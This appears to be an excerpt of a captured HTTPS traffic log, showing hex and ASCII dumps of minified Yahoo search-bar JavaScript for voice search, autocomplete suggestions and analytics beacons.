                                                                                                                                                                        2023-06-02 11:13:21 UTC496INData Raw: 6c 74 4d 65 73 73 61 67 65 22 3a 22 54 72 79 20 61 67 61 69 6e 2e 22 7d 2c 7b 22 69 64 22 3a 22 73 65 61 72 63 68 2e 76 6f 69 63 65 2e 72 65 63 6f 67 6e 69 74 69 6f 6e 5f 73 74 61 72 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 64 65 66 61 75 6c 74 4d 65 73 73 61 67 65 22 3a 22 57 68 61 74 20 77 6f 75 6c 64 20 79 6f 75 20 6c 69 6b 65 20 74 6f 20 73 65 61 72 63 68 20 66 6f 72 3f 22 7d 2c 7b 22 69 64 22 3a 22 73 65 61 72 63 68 2e 76 6f 69 63 65 2e 74 72 65 6e 64 69 6e 67 5f 74 69 74 6c 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 64 65 66 61 75 6c 74 4d 65 73 73 61 67 65 22 3a 22 54 72 79 20 73 61 79 69 6e 67 22 7d 2c 7b 22 69 64 22 3a 22 73 65 61 72 63 68 2e 76 6f 69 63 65 2e 74 72 65 6e 64 69 6e 67 5f 6f 72 22 2c 22 64
                                                                                                                                                                        Data Ascii: ltMessage":"Try again."},{"id":"search.voice.recognition_start","description":"","defaultMessage":"What would you like to search for?"},{"id":"search.voice.trending_title","description":"","defaultMessage":"Try saying"},{"id":"search.voice.trending_or","d
                                                                                                                                                                        2023-06-02 11:13:21 UTC497INData Raw: 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 64 28 6e 2c 7b 61 3a 6e 7d 29 2c 6e 7d 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 28 6e 2c 74 29 26 26 21 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 28 65 2c 74 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 74 5d 7d 29 7d 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                        Data Ascii: }:function(){return e};return __webpack_require__.d(n,{a:n}),n},__webpack_require__.d=function(e,n){for(var t in n)__webpack_require__.o(n,t)&&!__webpack_require__.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:n[t]})},__webpack_require__.o=function
                                                                                                                                                                        2023-06-02 11:13:21 UTC498INData Raw: 61 72 63 68 42 74 6e 2e 64 61 74 61 73 65 74 2e 66 72 32 7c 7c 44 45 46 41 55 4c 54 5f 46 52 32 7d 7d 2c 75 69 3a 7b 73 70 65 65 63 68 4f 76 65 72 6c 61 79 3a 7b 64 69 73 61 62 6c 65 42 6c 75 72 3a 42 4c 55 52 5f 44 49 53 41 42 4c 45 44 5f 52 45 47 49 4f 4e 53 2e 69 6e 63 6c 75 64 65 73 28 69 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 7d 2c 62 72 6f 77 73 65 72 73 3a 7b 65 64 67 65 3a 21 30 7d 2c 65 6e 61 62 6c 65 5f 76 6f 69 63 65 5f 74 72 65 6e 64 69 6e 67 3a 21 30 2c 74 72 65 6e 64 69 6e 67 3a 7b 6d 61 72 6b 65 74 3a 69 7d 7d 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 59 42 41 52 3a 20 56 6f 69 63 65 4a 53 20 6c 69 62 20 77 61 73 20 6e 6f 74 20 6c 6f 61 64 65 64 22 29 7d 3b 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 6f 63
                                                                                                                                                                        Data Ascii: archBtn.dataset.fr2||DEFAULT_FR2}},ui:{speechOverlay:{disableBlur:BLUR_DISABLED_REGIONS.includes(i.toLowerCase())}},browsers:{edge:!0},enable_voice_trending:!0,trending:{market:i}}):console.log("YBAR: VoiceJS lib was not loaded")};e.addElementListener(doc
                                                                                                                                                                        2023-06-02 11:13:21 UTC499INData Raw: 75 74 65 28 22 64 61 74 61 2d 6f 76 72 6c 79 2d 62 6b 74 22 2c 73 2e 62 75 63 6b 65 74 43 6f 6e 66 69 67 2e 6f 76 65 72 6c 61 79 5f 63 6c 61 73 73 29 2c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 6e 2e 73 65 61 72 63 68 46 6f 72 6d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 7c 7c 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 43 73 73 24 36 5b 73 2e 62 75 63 6b 65 74 43 6f 6e 66 69 67 2e 6f 76 65 72 6c 61 79 5f 63 6c 61 73 73 5d 29 3b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 43 73 73 24 36 2e 6f 76 65 72 6c 61 79 2c 43 73 73 24 36 5b 73 2e 62 75 63 6b 65 74 43 6f 6e 66 69 67 2e 6f 76 65 72 6c 61 79 5f 63 6c 61 73 73 5d 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f
                                                                                                                                                                        Data Ascii: ute("data-ovrly-bkt",s.bucketConfig.overlay_class),null===(o=n.searchForm)||void 0===o||o.classList.add(Css$6[s.bucketConfig.overlay_class]);var r=document.createElement("div");r.classList.add(Css$6.overlay,Css$6[s.bucketConfig.overlay_class]),document.bo
                                                                                                                                                                        2023-06-02 11:13:21 UTC501INData Raw: 61 74 6f 72 2e 61 70 70 4e 61 6d 65 26 26 28 74 3d 6e 65 77 20 52 65 67 45 78 70 28 22 4d 53 49 45 20 28 5b 30 2d 39 5d 7b 31 2c 7d 5b 2e 30 2d 39 5d 7b 30 2c 7d 29 22 29 2e 65 78 65 63 28 65 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 29 26 26 74 5b 31 5d 26 26 70 61 72 73 65 46 6c 6f 61 74 28 74 5b 31 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 61 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 74 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 29 7d 29 29 2c 30 3c 74 2e 6c 65 6e 67 74 68 3f 65 2b 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f
                                                                                                                                                                        Data Ascii: ator.appName&&(t=new RegExp("MSIE ([0-9]{1,}[.0-9]{0,})").exec(e.navigator.userAgent))&&t[1]&&parseFloat(t[1]);function r(e,n){var t=[];return a(n,(function(e,n){t.push(encodeURIComponent(e)+"="+encodeURIComponent(n))})),0<t.length?e+(-1===e.indexOf("?")?
                                                                                                                                                                        2023-06-02 11:13:21 UTC502INData Raw: 2c 65 26 26 65 2e 66 6f 72 45 61 63 68 3f 65 2e 66 6f 72 45 61 63 68 28 74 29 3a 74 28 65 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 76 61 72 20 6e 3d 65 2e 70 65 72 66 6f 72 6d 61 6e 63 65 7c 7c 7b 7d 2c 74 3d 6e 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 3b 72 65 74 75 72 6e 21 21 6f 7c 7c 28 6e 26 26 6e 2e 74 69 6d 69 6e 67 3f 30 3c 6e 2e 74 69 6d 69 6e 67 2e 6c 6f 61 64 45 76 65 6e 74 45 6e 64 3a 21 74 7c 7c 30 3c 28 6e 3d 74 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 29 2e 6c 65 6e 67 74 68 26 26 30 3c 6e 5b 30 5d 2e 6c 6f 61 64 45 76 65 6e 74 45 6e 64 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 7d 7d 65 2e 59 41 48 4f 4f 3d 65 2e 59 41 48 4f 4f 7c 7c 7b 7d 2c 76 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                        Data Ascii: ,e&&e.forEach?e.forEach(t):t(e)),i}function g(){var n=e.performance||{},t=n.getEntriesByType;return!!o||(n&&n.timing?0<n.timing.loadEventEnd:!t||0<(n=t("navigation")).length&&0<n[0].loadEventEnd)}function v(){this.config={}}e.YAHOO=e.YAHOO||{},v.prototype
                                                                                                                                                                        2023-06-02 11:13:21 UTC503INData Raw: 65 2e 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 3d 6e 2c 65 2e 73 65 6c 65 63 74 69 6f 6e 45 6e 64 3d 74 2c 75 28 65 29 29 7d 2c 68 61 73 43 6c 61 73 73 3a 68 2c 72 65 6d 6f 76 65 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 20 65 28 6e 2c 74 29 7b 76 61 72 20 69 3b 30 3c 74 2e 69 6e 64 65 78 4f 66 28 22 20 22 29 3f 74 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 6e 2c 74 29 7d 29 29 3a 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 65 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 3f 74 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 74 29 3a 65 26 26 65 2e 63 6c 61 73 73 4e 61 6d 65 26 26 28 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 5c 5c 73 2b 29 22 2b 6d 28
                                                                                                                                                                        Data Ascii: e.selectionStart=n,e.selectionEnd=t,u(e))},hasClass:h,removeClass:function e(n,t){var i;0<t.indexOf(" ")?t.split(" ").forEach((function(t){e(n,t)})):(i=function(e){var n;e&&e.classList?t&&e.classList.remove(t):e&&e.className&&(n=new RegExp("(?:^|\\s+)"+m(
                                                                                                                                                                        2023-06-02 11:13:21 UTC504INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 75 30 30 41 30 2d 5c 75 39 39 39 39 3c 3e 5c 26 5d 2f 67 69 6d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 26 23 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2b 22 3b 22 7d 29 29 7d 2c 61 66 74 65 72 4f 6e 6c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 67 28 29 29 72 65 74 75 72 6e 20 6e 28 29 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 6f 3d 21 30 2c 66 28 65 2c 69 2c 74 29 2c 6e 28 29 7d 2e 62 69 6e 64 28 65 2c 6e 2c 74 29 3b 70 28 65 2c 69 2c 74 29 7d 2c 67 65 74 57 69 6e 4c 6f 61 64 65 64 3a 67 2c 67 65 74 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                        Data Ascii: :function(e){return e&&e.replace(/[\u00A0-\u9999<>\&]/gim,(function(e){return"&#"+e.charCodeAt(0)+";"}))},afterOnload:function(n){if(g())return n();var t=function(n,t){o=!0,f(e,i,t),n()}.bind(e,n,t);p(e,i,t)},getWinLoaded:g,getDOMContentLoaded:function(){
                                                                                                                                                                        2023-06-02 11:13:21 UTC506INData Raw: 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 2c 73 65 6e 64 56 69 65 77 42 65 61 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 76 61 72 20 69 3b 65 2e 59 41 48 4f 4f 2e 53 42 2e 63 6f 6e 66 69 67 2e 69 31 33 6e 26 26 28 69 3d 65 2e 59 41 48 4f 4f 2e 53 42 2e 63 6f 6e 66 69 67 2e 69 31 33 6e 2c 74 3d 74 3f 22 62 22 3a 22 70 22 2c 6e 2e 73 7c 7c 28 6e 2e 5f 53 3f 6e 2e 73 3d 6e 2e 5f 53 3a 69 2e 73 70 61 63 65 69 64 26 26 28 6e 2e 73 3d 69 2e 73 70 61 63 65 69 64 29 29 2c 64 65 6c 65 74 65 20 6e 2e 5f 53 2c 21 6e 2e 6d 74 65 73 74 69 64 26 26 69 2e 6d 74 65 73 74 69 64 26 26 28 6e
                                                                                                                                                                        Data Ascii: e:function(){return document.scrollingElement||document.documentElement},sendViewBeacon:function(n,t){var i;e.YAHOO.SB.config.i13n&&(i=e.YAHOO.SB.config.i13n,t=t?"b":"p",n.s||(n._S?n.s=n._S:i.spaceid&&(n.s=i.spaceid)),delete n._S,!n.mtestid&&i.mtestid&&(n
                                                                                                                                                                        2023-06-02 11:13:21 UTC507INData Raw: 3d 4f 62 6a 65 63 74 28 74 68 69 73 29 2c 61 3d 72 2e 6c 65 6e 67 74 68 3e 3e 3e 30 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 65 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 66 6f 72 28 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 28 74 3d 6e 29 2c 69 3d 6e 65 77 20 41 72 72 61 79 28 61 29 2c 6f 3d 30 3b 6f 3c 61 3b 29 6f 20 69 6e 20 72 26 26 28 73 3d 72 5b 6f 5d 2c 73 3d 65 2e 63 61 6c 6c 28 74 2c 73 2c 6f 2c 72 29 2c 69 5b 6f 5d 3d 73 29 2c 6f 2b 2b 3b 72 65 74 75 72 6e 20 69 7d 29 2c 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e
                                                                                                                                                                        Data Ascii: =Object(this),a=r.length>>>0;if("function"!=typeof e)throw new TypeError(e+" is not a function");for(1<arguments.length&&(t=n),i=new Array(a),o=0;o<a;)o in r&&(s=r[o],s=e.call(t,s,o,r),i[o]=s),o++;return i}),String.prototype.includes||(String.prototype.in
                                                                                                                                                                        2023-06-02 11:13:21 UTC508INData Raw: 72 73 3d 7b 7d 2c 74 68 69 73 2e 63 62 3d 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 24 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 61 70 70 2e 76 69 65 77 2e 65 6c 65 6d 73 2c 6e 3d 65 2e 73 62 43 6c 65 61 72 3b 6e 26 26 28 30 3c 65 2e 73 62 49 6e 70 75 74 2e 76 61 6c 75 65 2e 6c 65 6e 67 74 68 3f 6c 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 6e 2c 22 73 61 2d 68 69 64 64 65 6e 22 29 3a 6c 2e 61 64 64 43 6c 61 73 73 28 6e 2c 22 73 61 2d 68 69 64 64 65 6e 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 48 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 56 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 65 2e 61 70 70 2e 76 69 65 77 2e 65 6c 65 6d 73 2e 73 62 46
                                                                                                                                                                        Data Ascii: rs={},this.cb={}}function $(){}function j(){}function U(){}function F(){var e=this.app.view.elems,n=e.sbClear;n&&(0<e.sbInput.value.length?l.removeClass(n,"sa-hidden"):l.addClass(n,"sa-hidden"))}function H(){}function V(){var e=this,n=e.app.view.elems.sbF
                                                                                                                                                                        2023-06-02 11:13:21 UTC510INData Raw: 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 63 74 6e 3a 7b 63 73 73 3a 22 73 61 2d 74 72 61 79 2d 63 74 6e 22 7d 2c 74 72 61 79 3a 7b 63 73 73 3a 22 73 61 2d 74 72 61 79 22 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 65 2c 6e 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 3b 6e 3d 6e 2e 6d 3b 65 2e 6c 69 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 22 2b 28 74 5b 6e 5d 7c 7c 74 5b 22 6d 22 2b 6e 5d 7c 7c 74 2e 66 6c 76 72 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 6d 31 33 3a 22 68 69 73 74 6f 72 79 22 2c 66 6c 76 72 3a 22 70 72 6f 67 2d 73 75 67 67 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 2c 6e 29 7b 76 61 72 20 74 2c 69 2c 6f 2c 73 3d 74 68 69 73 2c 72 3d 73 2e 63 6f 6e 66 69 67 3b 37 35 3d 3d 6e 2e
                                                                                                                                                                        Data Ascii: {this.config={ctn:{css:"sa-tray-ctn"},tray:{css:"sa-tray"}}}function Z(e,n){var t=this.config;n=n.m;e.li.className+=" "+(t[n]||t["m"+n]||t.flvr)}function ee(){this.config={m13:"history",flvr:"prog-sugg"}}function ne(e,n){var t,i,o,s=this,r=s.config;75==n.
                                                                                                                                                                        2023-06-02 11:13:21 UTC511INData Raw: 64 69 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 28 6e 2e 69 63 6f 6e 2c 22 73 70 61 6e 22 29 29 2c 6e 2e 74 65 78 74 26 26 65 2e 65 64 69 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 28 6e 2e 74 65 78 74 2c 22 73 70 61 6e 22 29 29 2c 6c 2e 73 65 74 28 65 2e 65 64 69 74 2c 22 70 6f 73 22 2c 65 2e 69 64 78 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 63 74 6e 3a 7b 63 73 73 3a 22 73 61 2d 65 64 69 74 22 7d 2c 69 63 6f 6e 3a 7b 63 73 73 3a 22 73 61 2d 65 64 69 74 2d 69 63 6f 6e 22 7d 2c 74 65 78 74 3a 7b 63 73 73 3a 22 73 61 2d 65 64 69 74 2d 74 65 78 74 22 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 65 2c 6e 29 7b 76 61 72 20 74 2c 69 2c 6f 2c 73 2c 72 2c 61 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2c 63 3d 6e 2e 64
                                                                                                                                                                        Data Ascii: dit.appendChild(t(n.icon,"span")),n.text&&e.edit.appendChild(t(n.text,"span")),l.set(e.edit,"pos",e.idx)}function se(){this.config={ctn:{css:"sa-edit"},icon:{css:"sa-edit-icon"},text:{css:"sa-edit-text"}}}function re(e,n){var t,i,o,s,r,a=this.config,c=n.d
                                                                                                                                                                        2023-06-02 11:13:21 UTC512INData Raw: 26 26 6e 26 26 28 69 3d 6e 2e 74 69 63 6b 65 72 2c 6e 3d 6e 2e 65 78 63 68 2c 69 29 26 26 6e 26 26 28 65 2e 74 69 74 6c 65 2e 69 6e 6e 65 72 48 54 4d 4c 2b 3d 74 68 69 73 2e 61 70 70 2e 66 6f 72 6d 61 74 28 74 2e 6b 5f 74 6d 70 6c 2c 5b 69 2c 6e 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 6b 5f 74 6d 70 6c 3a 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 61 2d 73 74 6b 2d 74 69 74 6c 65 22 3e 7b 30 7d 20 28 7b 31 7d 29 3c 2f 73 70 61 6e 3e 27 2c 66 64 5f 74 6d 70 6c 3a 27 7b 30 7d 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 7b 31 7d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 7b 32 7d 22 3e 3c 2f 73 70 61 6e 3e 7b 33 7d 20 28 7b 34 7d 29 3c 2f 73 70 61 6e 3e 27 2c 69 63 6f 6e 3a 22 73 61 2d 73 74 6b 2d 69 63 6f
                                                                                                                                                                        Data Ascii: &&n&&(i=n.ticker,n=n.exch,i)&&n&&(e.title.innerHTML+=this.app.format(t.k_tmpl,[i,n]))}function de(){this.config={k_tmpl:'<span class="sa-stk-title">{0} ({1})</span>',fd_tmpl:'{0}<span class="{1}"><span class="{2}"></span>{3} ({4})</span>',icon:"sa-stk-ico
                                                                                                                                                                        2023-06-02 11:13:21 UTC513INData Raw: 74 68 2b 6e 2e 73 65 70 54 68 72 65 73 68 6f 6c 64 3e 6e 2e 6d 61 78 4c 65 6e 3f 22 22 3a 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 61 2d 73 65 70 22 3e 20 e2 80 a2 20 3c 2f 73 70 61 6e 3e 27 2c 63 3d 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 61 2d 73 63 68 65 64 75 6c 65 22 3e 27 2b 6f 2b 22 3c 2f 73 70 61 6e 3e 22 2c 6c 3d 62 26 26 31 3c 62 3f 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 61 2d 6d 6f 72 65 2d 67 61 6d 65 73 22 3e 27 2b 5f 2b 22 3c 2f 73 70 61 6e 3e 22 3a 22 22 2c 65 2e 74 69 74 6c 65 3d 43 28 6e 2e 6c 65 61 67 75 65 5f 6e 5f 74 6d 70 6c 2c 5b 64 2c 74 2c 75 2c 70 2c 61 2b 73 2b 63 2b 72 2b 6c 5d 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 65 6c 73 65 20 65 2e 74 69 74 6c 65 3d 43 28 6e 2e 6c 65 61 67 75 65 5f 74 6d 70 6c 2c 5b 64 2c 70
                                                                                                                                                                        Data Ascii: th+n.sepThreshold>n.maxLen?"":'<span class="sa-sep"> </span>',c='<span class="sa-schedule">'+o+"</span>",l=b&&1<b?'<span class="sa-more-games">'+_+"</span>":"",e.title=C(n.league_n_tmpl,[d,t,u,p,a+s+c+r+l]))}catch(e){}else e.title=C(n.league_tmpl,[d,p
                                                                                                                                                                        2023-06-02 11:13:21 UTC515INData Raw: 63 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2c 6c 3d 65 2e 6d 3b 65 3d 65 2e 66 64 3b 34 31 3d 3d 6c 26 26 65 26 26 21 65 2e 73 75 62 74 69 74 6c 65 26 26 28 6c 3d 65 2e 69 6d 67 5f 75 72 6c 7c 7c 22 22 2c 6e 3d 65 2e 63 6f 6e 64 69 74 69 6f 6e 2c 74 3d 65 2e 64 65 67 72 65 65 2c 69 3d 65 2e 68 69 67 68 5f 74 65 6d 70 26 26 22 e2 80 a2 20 48 3a 22 2b 65 2e 68 69 67 68 5f 74 65 6d 70 2b 22 c2 b0 22 2c 6f 3d 65 2e 6c 6f 77 5f 74 65 6d 70 26 26 22 4c 3a 22 2b 65 2e 6c 6f 77 5f 74 65 6d 70 2b 22 c2 b0 22 2c 73 3d 65 2e 6c 6f 63 26 26 22 e2 80 a2 20 22 2b 65 2e 6c 6f 63 2c 72 3d 65 2e 77 61 72 6e 69 6e 67 3f 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 72 6e 69 6e 67 22 3e 3c 2f 64 69 76 3e 27 3a 22 22 2c 61 3d 74 68 69 73 2e 61 70 70 2e 66 6f 72 6d 61 74 2c 63 2e
                                                                                                                                                                        Data Ascii: c=this.config,l=e.m;e=e.fd;41==l&&e&&!e.subtitle&&(l=e.img_url||"",n=e.condition,t=e.degree,i=e.high_temp&&" H:"+e.high_temp+"",o=e.low_temp&&"L:"+e.low_temp+"",s=e.loc&&" "+e.loc,r=e.warning?'<div class="warning"></div>':"",a=this.app.format,c.
                                                                                                                                                                        2023-06-02 11:13:21 UTC516INData Raw: 67 2b 22 20 22 2b 6f 3a 69 2b 22 20 26 6d 69 64 64 6f 74 3b 20 22 2b 73 2e 74 65 78 74 2e 74 76 65 70 69 73 6f 64 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 7b 74 65 78 74 3a 7b 6d 6f 76 69 65 3a 22 6d 6f 76 69 65 22 2c 74 76 73 65 72 69 65 73 3a 22 54 56 20 73 65 72 69 65 73 22 2c 74 76 65 70 69 73 6f 64 65 3a 22 54 56 20 65 70 69 73 6f 64 65 22 2c 74 68 65 61 74 65 72 3a 22 49 6e 20 74 68 65 61 74 65 72 73 22 2c 73 74 72 65 61 6d 69 6e 67 3a 22 53 74 72 65 61 6d 69 6e 67 20 6f 6e 22 2c 70 6c 61 79 69 6e 67 3a 22 50 6c 61 79 69 6e 67 20 6f 6e 22 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 2c 6e 29 7b 76 61 72 20 74 2c 69 3d 65 2e 6c 69 2c 6f 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2c 73 3d 74 68 69 73 2e 63
                                                                                                                                                                        Data Ascii: g+" "+o:i+" &middot; "+s.text.tvepisode))}function ve(){this.config={text:{movie:"movie",tvseries:"TV series",tvepisode:"TV episode",theater:"In theaters",streaming:"Streaming on",playing:"Playing on"}}}function ye(e,n){var t,i=e.li,o=this.config,s=this.c
                                                                                                                                                                        2023-06-02 11:13:21 UTC517INData Raw: 22 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 29 7b 74 68 69 73 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3b 30 3c 3d 65 26 26 73 5b 65 5d 26 26 28 6c 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 73 5b 65 5d 2e 6c 69 2c 69 2e 63 73 73 29 2c 74 2e 61 70 70 2e 6e 6f 74 69 66 79 28 50 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 6c 2e 61 64 64 43 6c 61 73 73 28 65 2c 69 2e 63 73 73 29 2c 74 2e 61 70 70 2e 6e 6f 74 69 66 79 28 42 29 7d 76 61 72 20 74 3d 74 68 69 73 2c 69 3d 74 2e 63 6f 6e 66 69 67 2c 6f 3d 74 2e 61 70 70 2e 76 69 65 77 2c 73 3d 6f 2e 69 74 65 6d 73 2c 72 3d 28 64 3d 6f 2e 65 6c 65 6d
                                                                                                                                                                        Data Ascii: "}}}}function Ee(){this.selectedIndex=-1}function Se(){function e(){var e=t.selectedIndex;0<=e&&s[e]&&(l.removeClass(s[e].li,i.css),t.app.notify(P))}function n(e){l.addClass(e,i.css),t.app.notify(B)}var t=this,i=t.config,o=t.app.view,s=o.items,r=(d=o.elem
                                                                                                                                                                        2023-06-02 11:13:21 UTC517INData Raw: 64 2e 73 61 54 72 61 79 2c 64 3d 6c 2e 69 65 56 65 72 2c 75 3d 21 31 3b 6c 2e 61 65 28 63 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 66 6f 72 28 76 61 72 20 73 3d 69 2e 74 61 72 67 65 74 7c 7c 69 2e 73 72 63 45 6c 65 6d 65 6e 74 3b 73 26 26 73 21 3d 63 3b 29 7b 76 61 72 20 72 3d 6c 2e 67 65 74 28 73 2c 22 70 6f 73 22 29 2c 61 3d 72 3f 6f 2e 69 74 65 6d 73 5b 72 5d 3a 7b 7d 3b 69 66 28 61 26 26 73 3d 3d 3d 61 2e 6c 69 29 7b 65 28 29 2c 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 72 2c 6e 28 73 29 3b 62 72 65 61 6b 7d 73 3d 73 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 7d 29 29 2c 6c 2e 61 65 28 63 2c 22 6d 6f 75 73 65 6f 75 74 22 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 65 28 29 7d 29 29 2c 6c 2e 61 65 28 72 2c 22 6b 65 79
